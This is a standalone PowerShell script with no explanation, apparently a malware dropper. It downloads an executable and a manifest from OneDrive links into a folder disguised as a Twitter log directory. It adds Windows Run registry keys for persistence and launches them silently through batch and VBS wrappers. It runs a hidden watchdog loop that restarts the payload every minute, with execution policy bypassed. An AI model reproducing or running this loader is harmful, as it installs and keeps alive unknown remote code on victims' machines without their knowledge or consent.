

$Content = @'
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\ProgramData\Twitter\log\Untitled.exe"
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2 /d "C:\Windows\System32\cmd.exe '/c  powershell -windo 1 -noexit -exec bypass -file C:\ProgramData\Twitter\log\look.ps1"
'@
Set-Content -Path C:\Users\Public\1.bat -Value $Content

$Content = @'
set WshShell = wscript.createobject("WScript.shell")
WshShell.run """C:\Users\Public\1.bat"" ", 0, true
Set WshShell = Nothing
'@
Set-Content -Path C:\Users\Public\1.vbs -Value $Content
start-sleep 10
start C:\Users\Public\1.vbs





$OutPath = "C:\ProgramData\Twitter\log\"
if (-not (Test-Path  $OutPath ))
        {
            New-Item $OutPath -ItemType Directory -Force
        }

start-sleep 5

$url = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21140&authkey=AD54_li6xAtRpc8" 
$path = "C:\ProgramData\Twitter\log\Untitled.exe" 
# param([string]$url, [string]$path) 

if(!(Split-Path -parent $path) -or !(Test-Path -pathType Container (Split-Path -parent $path))) { 
$targetFile = Join-Path $pwd (Split-Path -leaf $path) 
} 

(New-Object Net.WebClient).DownloadFile($url, $path) 
$path



$url = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21139&authkey=AOITnE4lBM7QpdQ" 
$path = "C:\ProgramData\Twitter\log\Untitled.exe.manifest" 
# param([string]$url, [string]$path) 

if(!(Split-Path -parent $path) -or !(Test-Path -pathType Container (Split-Path -parent $path))) { 
$targetFile = Join-Path $pwd (Split-Path -leaf $path) 
} 

(New-Object Net.WebClient).DownloadFile($url, $path) 
$path

start-sleep 5
$Content = @'
while ($true){
if((get-process "Untitled" -ea SilentlyContinue) -eq $Null){
{
}
start C:\ProgramData\Twitter\log\Untitled.exe
}
start-sleep 60
}
'@
Set-Content -Path C:\ProgramData\Twitter\log\look.ps1 -Value $Content

start-sleep 5


powershell -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "C:\ProgramData\Twitter\log\look.ps1"










